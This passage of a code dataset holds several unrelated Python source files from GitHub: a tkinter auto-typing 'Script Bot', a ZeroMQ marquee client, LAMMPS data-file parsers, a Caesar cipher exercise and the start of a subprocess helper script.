encoding='utf-8').read().split()\r\n if (not interval.is_integer() and interval > 1) or interval < 0:\r\n smallerFont = tkFont.Font(family=\"Lucida Grande\", size=14, weight=\"bold\")\r\n status.configure(text=\"PLEASE ENTER AN INTEGER OR A NUMBER BETWEEN 0 AND 1\", font=smallerFont)\r\n return\r\n status.configure(text=\"Starting In 2 Seconds\")\r\n root.update()\r\n time.sleep(2)\r\n # resume_app(0)\r\n if lineOrWord.get() == 0:\r\n spam_word()\r\n elif lineOrWord.get() == 1:\r\n spam_line()\r\n\r\n\r\n'''\r\ndef resume_app(x):\r\n global exitButton\r\n exitButton.destroy()\r\n exitButton = ttk.Button(root, text=\"Exit\", width=10, state=tk.DISABLED)\r\n exitButton.place(relheight=0.08, relx=0.87, rely=0.905)\r\n global saveText, interval, pauseButton\r\n n = 1\r\n floatInterval = float(interval)\r\n if x == 0:\r\n # pauseButton.place(relheight=0.08, relwidth=.1, relx=0.67, rely=0.835)\r\n for word in sendText:\r\n pyautogui.typewrite(word)\r\n pyautogui.press(\"enter\")\r\n if floatInterval.is_integer() and interval > 0:\r\n for i in range(int(interval), 0, -1):\r\n if n == len(sendText):\r\n status.configure(text=\"DONE!\")\r\n root.update()\r\n else:\r\n status.configure(text=i)\r\n root.update()\r\n time.sleep(1)\r\n elif interval < 1:\r\n status.configure(text=\"QUICK MODE\")\r\n root.update()\r\n n += 1\r\n if n > len(sendText):\r\n n = n - 1\r\n intervalEntered.delete(1.0, \"end\")\r\n intervalEntered.insert(1.0, \"WORD COUNT: \" + str(n) + \" out of \" + str(len(sendText)))\r\n root.update()\r\n elif x == 1:\r\n global buttonFont\r\n status.configure(text=\"RESUMING\")\r\n root.update()\r\n pauseButton.destroy()\r\n buttonFont = tkFont.Font(size='20', weight='bold')\r\n pauseButton = tk.Button(root, text=\"||\", width=7, command=pause_app)\r\n pauseButton['font'] = buttonFont\r\n # pauseButton.place(relheight=0.08, relwidth=.1, relx=0.67, rely=0.835)\r\n time.sleep(1)\r\n status.configure(text=\"RESUMING\")\r\n root.update()\r\n exitButton.destroy()\r\n exitButton = ttk.Button(root, text=\"Exit\", width=10, command=lambda: sys.exit(0))\r\n exitButton.place(relheight=0.08, relx=0.87, rely=0.905)\r\n'''\r\n\r\n\r\ndef script_init(event):\r\n global scriptClicked\r\n if scriptClicked:\r\n return None\r\n else:\r\n scriptEntered.delete(1.0, \"end\")\r\n scriptClicked = True\r\n\r\n\r\ndef interval_init(event):\r\n global intervalClicked\r\n if intervalClicked:\r\n return None\r\n else:\r\n intervalEntered.delete(1.0, \"end\")\r\n intervalClicked = True\r\n\r\n\r\ndef clear_app():\r\n global scriptClicked, intervalClicked, interval, saveText\r\n scriptClicked = False\r\n intervalClicked = False\r\n interval = 0\r\n scriptEntered.delete(1.0, \"end\")\r\n scriptEntered.insert(1.0, \"Enter Your Script\")\r\n intervalEntered.delete(1.0, \"end\")\r\n intervalEntered.insert(1.0, \"Interval Duration (in seconds)\")\r\n saveText = open(\"send.txt\", \"w\", encoding='utf-8')\r\n saveText.writelines(\"\")\r\n saveText.close()\r\n status.configure(text=\"CLEARED!\")\r\n root.update()\r\n time.sleep(1)\r\n status.configure(text=\"SCRIPT BOT\")\r\n root.update()\r\n\r\n\r\n'''\r\ndef pause_app():\r\n global buttonFont\r\n global pauseButton\r\n status.configure(text=\"PAUSED\")\r\n root.update()\r\n pauseButton.destroy()\r\n buttonFont = tkFont.Font(size='40', weight='bold')\r\n pauseButton = tk.Button(root, text=\"▶\", width=7, command=lambda: resume_app(1))\r\n pauseButton['font'] = buttonFont\r\n # pauseButton.place(relheight=0.08, relwidth=.1, relx=0.67, rely=0.835)\r\n'''\r\n\r\nscriptEntered 
= tk.Text(root, width=50, height=22)\r\nscriptEntered.grid(column=0, row=0, pady=(50, 15), padx=(100, 0))\r\nscriptEntered.insert(1.0, \"Enter Your Script\")\r\n\r\nintervalEntered = tk.Text(root, width=50, height=2)\r\nintervalEntered.grid(column=0, row=1, padx=(100, 0))\r\nintervalEntered.insert(1.0, \"Interval Duration (in seconds)\")\r\n\r\nlineOrWord = IntVar()\r\n\r\nlineCB = ttk.Checkbutton(root, text=\"Line\", width=10, variable=lineOrWord, onvalue=1, offvalue=0)\r\nlineCB.place(relheight=0.08, relx=0.2, rely=0.81)\r\n\r\nwordCB = ttk.Checkbutton(root, text=\"Word\", width=10, variable=lineOrWord, onvalue=0, offvalue=1)\r\nwordCB.place(relheight=0.08, relx=0.2, rely=0.86)\r\nlineOrWord.set(1)\r\n\r\nstartButton = ttk.Button(root, text=\"Start\", width=30, command=spam_message)\r\nstartButton.place(relwidth=0.3, relheight=0.15, relx=0.35, rely=0.8)\r\n\r\nclearButton = ttk.Button(root, text=\"Clear\", width=10, command=clear_app)\r\nclearButton.place(relheight=0.08, relx=0.011, rely=0.905)\r\n\r\nbuttonFont = tkFont.Font(size='20', weight='bold')\r\n\r\n# pauseButton = tk.Button(root, text=\"||\", width=7, command=pause_app)\r\n# pauseButton['font'] = buttonFont\r\n# pauseButton.place(relheight=0.08, relwidth=.1, relx=0.67, rely=0.835)\r\n\r\nexitButton = ttk.Button(root, text=\"Exit\", width=10, command=lambda: sys.exit(0))\r\nexitButton.place(relheight=0.08, relx=0.87, rely=0.905)\r\n\r\nfontStyle = tkFont.Font(family=\"Lucida Grande\", size=24, weight=\"bold\")\r\n\r\nstatus = ttk.Label(root, text=\"SCRIPT BOT\", width=50, font=fontStyle, anchor=\"center\")\r\nstatus.place(relwidth=1, relheight=0.068, relx=0.0, rely=0.007)\r\n\r\nscriptEntered.bind(\"\", script_init)\r\nintervalEntered.bind(\"\", interval_init)\r\n\r\nscrollbar = Scrollbar(root)\r\nscrollbar.grid(column=1, row=0, sticky='ns', pady=(50, 15))\r\nscriptEntered.config(yscrollcommand=scrollbar.set)\r\nscrollbar.config(command=scriptEntered.yview)\r\n\r\n# root.iconbitmap('icon.ico')\r\nroot.resizable(False, False)\r\nroot.mainloop()\r\n","repo_name":"cengizozel/Script-Bot","sub_path":"ScriptBot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"12263404431","text":"#!/usr/bin/python\n\nimport zmq\nimport sys\nimport time\nfrom PIL import Image\nimport base64\n\ndef main():\n context = zmq.Context()\n zmq_sock = context.socket(zmq.REQ)\n zmq_sock.connect(\"tcp://127.0.0.1:5556\")\n cmd = sys.argv[1]\n target = sys.argv[2]\n param = {}\n if target == \"show_image\":\n image = Image.open(sys.argv[3])\n param = {\n 'pixels': base64.b64encode(image.tobytes()),\n 'size': image.size,\n 'mode': image.mode,\n }\n elif len(sys.argv) > 3:\n param = dict(zip(sys.argv[3::2], sys.argv[4::2]))\n msg = {cmd: target, \"param\": param} # e.g. 
{'action': 'set_line', 'param': {'row': 1, 'value': 'your text here'}}\n zmq_sock.send_json(msg)\n result = zmq_sock.recv_json()\n print(\"Result: {0}\".format(result))\n# end main\n\nif __name__ == '__main__':\n main()\n","repo_name":"sampscl/scope-marquee","sub_path":"scope-marquee/tell-marquee.py","file_name":"tell-marquee.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"39840687310","text":"from colorama import Fore\n\n\ndef lid_header(fname):\n \"\"\" This function extracts header from LAMMPS input data file.\n\n Syntax:\n mol_data, typ_data, bnd_data = lid_header(fname)\n\n Input argument(s):\n fname: Name of LAMMPS input data file.\n\n Output argument(s):\n molecular_data: No. of atoms, bonds, angles, dihedrals, and impropers\n in LAMMPS input data file.\n\n types_data: No. of atom, bond, angle, dihedral, and improper types in\n LAMMPS input data file.\n\n boundary_data: Data of periodic boundary box which contains lower and\n upper limits of simulation box in x, y, and z directions.\n\n Example:\n mol_data, typ_data, bnd_data = lid_header(\"system.data\")\n\n \"\"\"\n\n with open(fname, \"r\") as ifile:\n lines = ifile.readlines()\n ifile.close()\n\n sections = [\"Masses\", \"Atoms\", \"Bonds\", \"Angles\", \"Dihedrals\", \"Impropers\"]\n molecular_prop = [\"atoms\", \"bonds\", \"angles\", \"dihedrals\", \"impropers\"]\n types_prop = [\"atom\", \"bond\", \"angle\", \"dihedral\", \"improper\"]\n boundary_prop = [\"xlo\", \"xhi\", \"ylo\", \"yhi\", \"zlo\", \"zhi\"]\n molecular_data = [0, 0, 0, 0, 0]\n types_data = [0, 0, 0, 0, 0]\n boundary_data = [0, 0, 0, 0, 0, 0]\n\n for line in lines:\n line = line.split()\n\n if (len(line) >= 2 and line[1] in molecular_prop):\n molecular_data[molecular_prop.index(line[1])] = line[0]\n\n elif (len(line) >= 3 and line[1] in types_prop):\n types_data[types_prop.index(line[1])] = line[0]\n\n elif (len(line) >= 4 and line[2] in boundary_prop):\n boundary_data[boundary_prop.index(line[2])] = line[0]\n boundary_data[boundary_prop.index(line[2]) + 1] = line[1]\n\n elif ((len(line) >= 1) and (line[0] in sections)):\n break\n\n return molecular_data, types_data, boundary_data\n\n\ndef parse_lid(fname):\n \"\"\"This function parses LAMMPS input data file and returns the line numbers\n at which various sections of LAMMPS input data start.\n\n Syntax:\n lid_sections = parse_lid(fname)\n\n Input argument(s):\n fname: Name of LAMMPS input data file.\n\n Output argument(s):\n The output argument of this function is a list containing six sublists\n i.e., 1. masses section, 2. atoms section, 3. bonds section,\n 4. angles section, 5. dihedrals section, and 6. impropers section.\n Each sublist has two elements in which first element is the line\n number of LAMMPS input data file at which the corresponding section\n starts and second element is always zero. If first element of a sublist\n is zero, it means the corresponding section does not exist in LAMMPS\n input data file. 
Second zero element in any sublist is utilized by\n other functions of this module to extract required data of a section\n from LAMMPS input data file.\n\n Example:\n lid_sections = parse_lid(\"system.data\")\n\n \"\"\"\n\n with open(fname, \"r\") as ifile:\n lines = ifile.readlines()\n ifile.close()\n\n mas_section = [0, 0]\n atm_section = [0, 0]\n bnd_section = [0, 0]\n ang_section = [0, 0]\n dih_section = [0, 0]\n imp_section = [0, 0]\n\n counter = 0\n\n for line in lines:\n line = line.split()\n\n if (len(line) >= 1 and line[0] == \"Masses\"):\n mas_section[0] = counter\n\n elif (len(line) >= 1 and line[0] == \"Atoms\"):\n atm_section[0] = counter\n\n elif (len(line) >= 1 and line[0] == \"Bonds\"):\n bnd_section[0] = counter\n\n elif (len(line) >= 1 and line[0] == \"Angles\"):\n ang_section[0] = counter\n\n elif (len(line) >= 1 and line[0] == \"Dihedrals\"):\n dih_section[0] = counter\n\n elif (len(line) >= 1 and line[0] == \"Impropers\"):\n imp_section[0] = counter\n\n counter += 1\n\n return [mas_section, atm_section, bnd_section, ang_section, dih_section,\n imp_section]\n\n\ndef masses(fname):\n \"\"\"This function returns masses section from LAMMPS input data file.\n\n Syntax:\n masses_data = masses(fname)\n\n Input argument(s):\n fname: Name of LAMMPS input data file.\n\n Output argument(s):\n masses_data: Data of atomic masses of elements in the relevant force\n field in LAMMPS input data file.\n\n Example:\n masses_data = masses(\"system.data\")\n\n \"\"\"\n\n in_data = parse_lid(fname)\n\n stop = []\n\n if in_data[0][0] == 0:\n print(Fore.RED + \"Warning: No masses data available.\")\n print(Fore.RED + \"LAMMPS simulation can't run.\")\n masses_data = None\n start = -1\n stop = -1\n\n elif in_data[0][0] == max(in_data)[0]:\n start = in_data[0][0] + 1\n stop = None\n else:\n for element in enumerate(in_data):\n\n if element[1][0] - in_data[0][0] == 0:\n stop.append(5000000000000)\n\n elif element[1][0] - in_data[0][0] < 0:\n stop.append(5000000000000)\n\n elif element[1][0] - in_data[0][0] > 0:\n stop.append(element[1][0] - in_data[0][0])\n\n stop = stop.index(min(stop))\n stop = in_data[stop][0]\n start = in_data[0][0] + 1\n\n with open(fname, \"r\") as infile:\n lines = infile.readlines()[start:stop]\n infile.close()\n\n masses_data = []\n for line in lines:\n line = line.split()\n\n if line != []:\n masses_data.append(line)\n\n return masses_data\n\n\ndef atoms(fname):\n \"\"\"This function returns atoms section from LAMMPS input data file.\n\n Syntax:\n atoms_data = atoms(fname)\n\n Input argument(s):\n fname: Name of LAMMPS input data file.\n\n Output argument(s):\n atoms_data: Atoms data (atomic IDs, atom types, molecular IDs, charge,\n and x, y, z coordinates of all atoms in the simulation box) from\n LAMMPS input data file.\n\n Example:\n atoms_data = atoms(\"system.data\")\n\n \"\"\"\n\n in_data = parse_lid(fname)\n\n stop = []\n\n if in_data[1][0] == 0:\n print(Fore.RED + \"Warning: No atoms data available.\")\n print(Fore.RED + \"LAMMPS simulation can't run.\")\n atoms_data = None\n start = -1\n stop = -1\n\n elif in_data[1][0] == max(in_data)[0]:\n start = in_data[1][0] + 1\n stop = None\n\n else:\n for element in enumerate(in_data):\n\n if element[1][0] - in_data[1][0] == 0:\n stop.append(5000000000000)\n\n elif element[1][0] - in_data[1][0] < 0:\n stop.append(5000000000000)\n\n elif element[1][0] - in_data[1][0] > 0:\n stop.append(element[1][0] - in_data[1][0])\n\n stop = stop.index(min(stop))\n stop = in_data[stop][0]\n start = in_data[1][0] + 1\n\n with 
open(fname, \"r\") as infile:\n lines = infile.readlines()[start:stop]\n infile.close()\n\n atoms_data = []\n for line in lines:\n line = line.split()\n\n if line != []:\n atoms_data.append(line)\n\n return atoms_data\n\n\ndef bonds(fname):\n \"\"\"This function returns bonds section from LAMMPS input data file.\n\n Syntax:\n bonds_data = bonds(fname)\n\n Input argument(s):\n fname: Name of LAMMPS input data file.\n\n Output argument(s):\n bonds_data: Bonds data (bond IDs, bond types, atomic IDs of bonding\n atoms) from LAMMPS input data file.\n\n Example:\n bonds_data = bonds(\"system.data\")\n\n \"\"\"\n\n in_data = parse_lid(fname)\n\n stop = []\n\n if in_data[2][0] == 0:\n print(Fore.RED + \"Warning: No atoms data available.\")\n print(Fore.RED + \"LAMMPS simulation may produce wrong results.\")\n bonds_data = None\n start = -1\n stop = -1\n\n elif in_data[2][0] == max(in_data)[0]:\n start = in_data[2][0] + 1\n stop = None\n\n else:\n for element in enumerate(in_data):\n\n if element[1][0] - in_data[2][0] == 0:\n stop.append(5000000000000)\n\n elif element[1][0] - in_data[2][0] < 0:\n stop.append(5000000000000)\n\n elif element[1][0] - in_data[2][0] > 0:\n stop.append(element[1][0] - in_data[2][0])\n\n stop = stop.index(min(stop))\n stop = in_data[stop][0]\n start = in_data[2][0] + 1\n\n with open(fname, \"r\") as infile:\n lines = infile.readlines()[start:stop]\n infile.close()\n\n bonds_data = []\n for line in lines:\n line = line.split()\n\n if line != []:\n bonds_data.append(line)\n\n return bonds_data\n\n\ndef angles(fname):\n \"\"\"This function returns angles section from LAMMPS input data file.\n\n Syntax:\n angles_data = angles(fname)\n\n Input argument(s):\n fname: Name of LAMMPS input data file.\n\n Output argument(s):\n angles_data: Angles data (angle IDs, angle types, and atomic IDs having\n angle) from LAMMPS input data file.\n\n Example:\n angles_data = angles(\"system.data\")\n\n \"\"\"\n\n in_data = parse_lid(fname)\n\n stop = []\n\n if in_data[3][0] == 0:\n print(Fore.RED + \"Warning: No angles data available.\")\n print(Fore.RED + \"LAMMPS simulation may produce wrong results.\")\n angles_data = None\n start = -1\n stop = -1\n\n elif in_data[3][0] == max(in_data)[0]:\n start = in_data[3][0] + 1\n stop = None\n\n else:\n for element in enumerate(in_data):\n\n if element[1][0] - in_data[3][0] == 0:\n stop.append(5000000000000)\n\n elif element[1][0] - in_data[3][0] < 0:\n stop.append(5000000000000)\n\n elif element[1][0] - in_data[3][0] > 0:\n stop.append(element[1][0] - in_data[3][0])\n\n stop = stop.index(min(stop))\n stop = in_data[stop][0]\n start = in_data[3][0] + 1\n\n with open(fname, \"r\") as infile:\n lines = infile.readlines()[start:stop]\n infile.close()\n\n angles_data = []\n for line in lines:\n line = line.split()\n\n if line != []:\n angles_data.append(line)\n\n return angles_data\n\n\ndef dihedrals(fname):\n \"\"\"This function returns dihedrals section from LAMMPS input data file.\n\n Syntax:\n dihedrals_data = dihedrals(fname)\n\n Input argument(s):\n fname: Name of LAMMPS input data file.\n\n Output argument(s):\n dihedrals_data: Dihedrals data (dihedral IDs, dihedral types, and\n atomic IDs having dihedral angle) from LAMMPS input data file.\n\n Example:\n dihedrals_data = dihedrals(\"system.data\")\n\n \"\"\"\n\n in_data = parse_lid(fname)\n\n stop = []\n\n if in_data[4][0] == 0:\n print(Fore.RED + \"Warning: No dihedrals data available.\")\n print(Fore.RED + \"LAMMPS simulation may produce wrong results.\")\n dihedrals_data = None\n start = -1\n 
stop = -1\n\n elif in_data[4][0] == max(in_data)[0]:\n start = in_data[4][0] + 1\n stop = None\n\n else:\n for element in enumerate(in_data):\n\n if element[1][0] - in_data[4][0] == 0:\n stop.append(5000000000000)\n\n elif element[1][0] - in_data[4][0] < 0:\n stop.append(5000000000000)\n\n elif element[1][0] - in_data[4][0] > 0:\n stop.append(element[1][0] - in_data[4][0])\n\n stop = stop.index(min(stop))\n stop = in_data[stop][0]\n start = in_data[4][0] + 1\n\n with open(fname, \"r\") as infile:\n lines = infile.readlines()[start:stop]\n infile.close()\n\n dihedrals_data = []\n for line in lines:\n line = line.split()\n\n if line != []:\n dihedrals_data.append(line)\n\n return dihedrals_data\n\n\ndef impropers(fname):\n \"\"\"This function returns impropers section from LAMMPS input data file.\n\n Syntax:\n impropers_data = impropers(fname)\n\n Input argument(s):\n fname: Name of LAMMPS input data file.\n\n Output argument(s):\n impropers_data: Impropers data (improper IDs, improper types, and\n atomic IDs having improper angle) from LAMMPS input data file.\n\n Example:\n impropers_data = impropers(\"system.data\")\n\n \"\"\"\n\n in_data = parse_lid(fname)\n\n stop = []\n\n if in_data[5][0] == 0:\n print(Fore.RED + \"Warning: No impropers data available.\")\n print(Fore.RED + \"LAMMPS simulation may produce wrong results.\")\n impropers_data = None\n start = -1\n stop = -1\n\n elif in_data[5][0] == max(in_data)[0]:\n start = in_data[5][0] + 1\n stop = None\n\n else:\n for element in enumerate(in_data):\n\n if element[1][0] - in_data[5][0] == 0:\n stop.append(5000000000000)\n\n elif element[1][0] - in_data[5][0] < 0:\n stop.append(5000000000000)\n\n elif element[1][0] - in_data[5][0] > 0:\n stop.append(element[1][0] - in_data[5][0])\n\n stop = stop.index(min(stop))\n stop = in_data[stop][0]\n start = in_data[5][0] + 1\n\n with open(fname, \"r\") as infile:\n lines = infile.readlines()[start:stop]\n infile.close()\n\n impropers_data = []\n for line in lines:\n line = line.split()\n\n if line != []:\n impropers_data.append(line)\n\n return impropers_data\n","repo_name":"aamirlab/AAMIR-Pack","sub_path":"src/lid_functions.py","file_name":"lid_functions.py","file_ext":"py","file_size_in_byte":13238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"42673623236","text":"import string\nimport re\nfrom random import randint\n\n### HELPER CODE ###\ndef load_words(file_name):\n '''\n file_name (string): the name of the file containing \n the list of words to load \n \n Returns: a list of valid words. 
Words are strings of lowercase letters.\n \n Depending on the size of the word list, this function may\n take a while to finish.\n '''\n# print(\"Loading word list from file...\")\n # inFile: file\n inFile = open(file_name, 'r')\n # wordlist: list of strings\n wordlist = []\n for line in inFile:\n wordlist.extend([word.lower() for word in line.split(' ')])\n# print(\" \", len(wordlist), \"words loaded.\")\n return wordlist\n\ndef is_word(word_list, word):\n '''\n Determines if word is a valid word, ignoring\n capitalization and punctuation\n\n word_list (list): list of words in the dictionary.\n word (string): a possible word.\n \n Returns: True if word is in word_list, False otherwise\n\n Example:\n >>> is_word(word_list, 'bat') returns\n True\n >>> is_word(word_list, 'asdf') returns\n False\n '''\n word = word.lower()\n word = word.strip(\" !@#$%^&*()-_+={}[]|\\:;'<>?,./\\\"\")\n return word in word_list\n\n#def get_story_string():\n# \"\"\"\n# Returns: a story in encrypted text.\n# \"\"\"\n# f = open(\"story.txt\", \"r\")\n# story = str(f.read())\n# f.close()\n# return story\n#\n### END HELPER CODE ###\n\nWORDLIST_FILENAME = 'words.txt'\n\nclass Message(object):\n def __init__(self, text):\n '''\n Initializes a Message object\n \n text (string): the message's text\n\n a Message object has two attributes:\n self.message_text (string, determined by input text)\n self.valid_words (list, determined using helper function load_words)\n '''\n self.message_text = text\n self.valid_words = load_words(WORDLIST_FILENAME)\n\n def get_message_text(self):\n '''\n Used to safely access self.message_text outside of the class\n \n Returns: self.message_text\n '''\n return self.message_text\n\n def get_valid_words(self):\n '''\n Used to safely access a copy of self.valid_words outside of the class.\n This helps you avoid accidentally mutating class attributes.\n \n Returns: a COPY of self.valid_words\n '''\n return self.valid_words\n \n def build_shift_dict(self, shift):\n '''\n Creates a dictionary that can be used to apply a cipher to a letter.\n The dictionary maps every uppercase and lowercase letter to a\n character shifted down the alphabet by the input shift. The dictionary\n should have 52 keys of all the uppercase letters and all the lowercase\n letters only. \n \n shift (integer): the amount by which to shift every letter of the \n alphabet. 0 <= shift < 26\n\n Returns: a dictionary mapping a letter (string) to \n another letter (string). 
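Example: with shift=3\n        this implementation maps 'd' to 'a' and wraps 'a' around to 'x',\n        i.e. letters are shifted backwards via negative list indexing.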
\n        '''\n\n        lower_letters = list(string.ascii_lowercase)\n        upper_letters = list(string.ascii_uppercase)\n        mapping_dict = {}\n        for ch in string.ascii_letters:\n            if ch in string.ascii_lowercase:\n                index = lower_letters.index(ch)\n                shift_change = index - shift\n                if abs(shift_change) > 26 :\n                    shift_change %=26 \n                mapping_dict[ch] = lower_letters[shift_change] \n            if ch in string.ascii_uppercase:\n                index = upper_letters.index(ch) \n                shift_change = index - shift\n                if abs(shift_change) > 26 :\n                    shift_change %=26 \n                mapping_dict[ch] = upper_letters[shift_change] \n        return mapping_dict\n    \n    def apply_shift(self, shift):\n        '''\n        Applies the Caesar Cipher to self.message_text with the input shift.\n        Creates a new string that is self.message_text shifted down the\n        alphabet by some number of characters determined by the input shift \n        \n        shift (integer): the shift with which to encrypt the message.\n        0 <= shift < 26\n\n        Returns: the message text (string) in which every character is shifted\n        down the alphabet by the input shift\n        '''\n        original_list = list(self.get_message_text())\n        req_list = []\n        mapping_dict = self.build_shift_dict(shift) \n        for ch in original_list:\n            if ch in string.ascii_letters:\n                req_list.append(mapping_dict[ch])\n            else:\n                req_list.append(ch)\n        return(''.join(req_list))\n    \n\nclass PlaintextMessage(Message):\n    def __init__(self, text, shift):\n        '''\n        Initializes a PlaintextMessage object \n        \n        text (string): the message's text\n        shift (integer): the shift associated with this message\n\n        A PlaintextMessage object inherits from Message and has five attributes:\n            self.message_text (string, determined by input text)\n            self.valid_words (list, determined using helper function load_words)\n            self.shift (integer, determined by input shift)\n            self.encryption_dict (dictionary, built using shift)\n            self.message_text_encrypted (string, created using shift)\n\n        '''\n        self.message_text = text\n        self.valid_words = load_words(WORDLIST_FILENAME)\n        self.shift = shift\n        self.encryption_dict = self.build_shift_dict(shift)\n        self.message_text_encrypted = self.apply_shift(shift)\n\n    def get_shift(self):\n        '''\n        Used to safely access self.shift outside of the class\n        \n        Returns: self.shift\n        '''\n        return self.shift\n\n    def get_encryption_dict(self):\n        '''\n        Used to safely access a copy of self.encryption_dict outside of the class\n        \n        Returns: a COPY of self.encryption_dict\n        '''\n        return self.encryption_dict.copy()\n    \n    def get_message_text_encrypted(self):\n        '''\n        Used to safely access self.message_text_encrypted outside of the class\n        \n        Returns: self.message_text_encrypted\n        '''\n        return self.message_text_encrypted\n\n    def change_shift(self, shift):\n        '''\n        Changes self.shift of the PlaintextMessage and updates other \n        attributes determined by shift. \n        \n        shift (integer): the new shift that should be associated with this message.\n        0 <= shift < 26\n\n        Returns: nothing\n        '''\n        self.__init__(self.message_text, shift)\n\n\nclass CiphertextMessage(Message):\n    def __init__(self, text):\n        '''\n        Initializes a CiphertextMessage object\n        \n        text (string): the message's text\n\n        a CiphertextMessage object has two attributes:\n            self.message_text (string, determined by input text)\n            self.valid_words (list, determined using helper function load_words)\n        '''\n#        print(\"Entered Class Cipher Message\")\n        self.message_text = text\n        self.valid_words = load_words(WORDLIST_FILENAME)\n\n    \n\n    def decrypt_message(self):\n        '''\n        Decrypt self.message_text by trying every possible shift value\n        and find the \"best\" one. We will define \"best\" as the shift that\n        creates the maximum number of real words when we use apply_shift(shift)\n        on the message text. If s is the original shift value used to encrypt\n        the message, then we would expect 26 - s to be the best shift value \n        for decrypting it.\n\n        Note: if multiple shifts are equally good such that they all create \n        the maximum number of valid words, you may choose any of those shifts \n        (and their corresponding decrypted messages) to return\n\n        Returns: decrypted message text\n        \n        '''\n#        print(\"Entered Class Decrypt Message\")\n        string_cut = self.get_message_text()\n#        print(string_cut)\n        words_all = re.findall(r\"[\\w']+|[.,!?;]+ |[\\\" @#$%^&*()_+\\<\\>\\!\\{\\}\\'\\\\\\/]\",string_cut)\n#        while(\"\" in words):\n#            words.remove(\"\")\n        words= []\n        for w in words_all:\n            # a word qualifies only if every character is an ASCII letter;\n            # anything else has no entry in the shift dictionary\n            flag = 0\n            for ch in w:\n                if ch not in string.ascii_letters:\n                    flag = 1\n                    break\n            if flag ==0:\n                words.append(w)\n#        print(words)\n        \n        shift_list = []\n        for w in words:\n            shift = 0\n            while (shift<27):\n                new_letter = []\n                dictionary = self.build_shift_dict(shift)\n                for ch in w:\n                    new_letter.append(dictionary[ch])\n                new_word= ''.join(new_letter)\n                if (is_word(self.valid_words, new_word)): \n                    shift_list.append(shift)\n                    break\n                else:\n                    shift+=1\n            if shift ==27:\n                shift_list.append(0)\n\n#        print(shift_list)\n        i= 0\n        real_word_list=[]\n        for w in words:\n#            print(w)\n            real_char_list= []\n            mapping_dict = self.build_shift_dict(shift_list[i]) \n            for ch in w:\n                real_char_list.append(mapping_dict[ch])\n            real_word = ''.join(real_char_list)\n#            print(real_word)\n            real_word_list.append(real_word)\n            i+=1\n#        print(real_word_list)\n        \n#        print(words_all)\n        i=0\n        # enumerate avoids the duplicate-word bug of words_all.index(w)\n        for index, w in enumerate(words_all):\n            flag = 0\n            for ch in w:\n                if ch in string.ascii_letters:\n                    flag = 1\n                else:\n                    flag = 0\n                    break\n            if flag ==1:\n                words_all[index] = real_word_list[i]\n#                print(w)\n#                print(real_word_list[i])\n#                print(\"Transfer happening\")\n                i+=1\n#        print(words_all)\n        decrypted_string = ''.join(words_all)\n        return decrypted_string\n    \n    def get_multiple(self,word):\n        '''\n        inputs a scrambled word and returns all possible solutions\n        ''' \n        shift_list = []\n        shift = 0\n        point =0\n        while (shift<26):\n            new_letter = []\n            dictionary = self.build_shift_dict(shift)\n            for ch in word:\n                if ch in string.ascii_letters:\n                    new_letter.append(dictionary[ch])\n            new_word= ''.join(new_letter)\n            if (is_word(self.valid_words, new_word)): \n                shift_list.append(shift)\n                point +=1\n                shift +=1\n#                print(shift)\n            else:\n                shift+=1\n#        print(shift_list)\n        if point >= 1: \n            real_word = []\n            i= 0\n            real_char_list= []\n            while(i < point):\n                mapping_dict = self.build_shift_dict(shift_list[i]) \n                for ch in word:\n                    if ch in string.ascii_letters:\n                        real_char_list.append(mapping_dict[ch])\n                real_word.append( ''.join(real_char_list))\n                real_char_list= []\n                i+=1\n            return real_word\n\nif __name__ == '__main__':\n    print(\"Welcome to Caesar Cipher Console\")\n    inp = input(\"Enter the console Definition \\n 0 :Encrypt the message \\n 1: Decrypt the message \\n\")\n    if inp == '0':\n        text = input(\"Enter text to Encrypt\")\n        text_list = re.findall(r\"[\\w']+|[.,!?;]+ |[\\\" @#$%^&*()_+\\<\\>\\!\\{\\}\\'\\\\\\/]\", text)\n#        print(text_list)\n        Encrypted_word = []\n        for word in text_list:\n            if word in string.punctuation:\n                Encrypted_word.append(word)\n            else:\n                T = Message(word)\n                shift = randint(1, 25)\n                Encrypted_word.append(T.apply_shift(shift))\n        print(''.join(Encrypted_word))\n    if inp == '1':\n        proceed = 1\n        try:\n            text = input(\"Enter Message to decrypt\")\n            T = 
CiphertextMessage(text)\n print(T.decrypt_message())\n except:\n proceed =0\n print(\"The text entered has Encountered an Error.\\n Please check the Spellings and input only the valid Words for Encryption as provided in the wordlist.\")\n if proceed == 1:\n print(\"Some Words might have actually found multiple solutions. Would you like to review them? \")\n key = input(\"0: NO thanks i have found the message! \\n1:Yes give me those.The message is not clear!\\n\")\n if key == '1':\n text_list = re.findall(r\"[\\w']+|[.,!?;]+ |[\\\" @#$%^&*()_+\\<\\>\\!\\{\\}\\'\\\\\\/]\", text)\n for word in text_list:\n if word not in string.punctuation:\n if word != \" \" :\n print(word + ':',T.get_multiple(word))","repo_name":"AbhilashKonduri/6.0001_MITOCW","sub_path":"PSET_4_Encryption_Decryption/Encrypt_Decrypt_1.py","file_name":"Encrypt_Decrypt_1.py","file_ext":"py","file_size_in_byte":13241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"25491492944","text":"from subprocess import Popen, PIPE, STDOUT\nfrom outlawg import Outlawg\n\n\nLog = Outlawg()\n\nSEP = ', UUID: '\nLABEL_PLAN_FOUND = 'Found plan: '\nLABEL_PLAN_ADDED = 'Added plan: '\nHOST = '127.0.0.1'\nPORT = 8080\nSTOP_FLAG = 'Listening on port'\n\n\ndef process(cmd, header_label):\n proc = Popen(cmd, stdout=PIPE, stderr=STDOUT, shell=True)\n Log.header(header_label.upper())\n for line in iter(proc.stdout.readline, b''):\n print(line.strip())\n\n\ndef description_parse(description_raw):\n tmp = description_raw.replace(LABEL_PLAN_FOUND, \"\")\n return tmp.replace(LABEL_PLAN_ADDED, \"\")\n\n\ndef process_parse(cmd, header_label):\n proc = Popen(cmd, stdout=PIPE, stderr=STDOUT, shell=True)\n Log.header(header_label.upper())\n uuids = []\n\n for line in iter(proc.stdout.readline, b''):\n line_clean = str(line.strip())\n print(line_clean)\n\n line_chunks = line_clean.split(SEP)\n\n # database is loaded, exit from readline\n if 